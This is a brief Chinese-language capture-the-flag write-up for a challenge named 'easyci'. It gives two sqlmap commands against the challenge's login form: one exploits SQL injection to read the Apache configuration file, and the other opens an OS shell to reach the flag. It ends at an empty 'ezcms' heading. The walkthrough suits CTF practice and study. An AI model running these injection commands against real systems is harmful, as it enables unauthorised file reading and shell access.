easyci
一道SQL注入题,大概思路:sql注入写入shell,读取flag文件。
sqlmap先读取"/etc/apache2/apache2.conf"内容。
sqlmap -u http://eci-2ze0xe7juyhmgubdhea1.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql --threads=10 --file-read="/etc/apache2/apache2.conf"
发现绝对路径(/var/sercet/html)再写入shell
sqlmap -u http://eci-2ze3qpk9e6qoggl1cuol.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql --os-shell
ezcms
参考文章: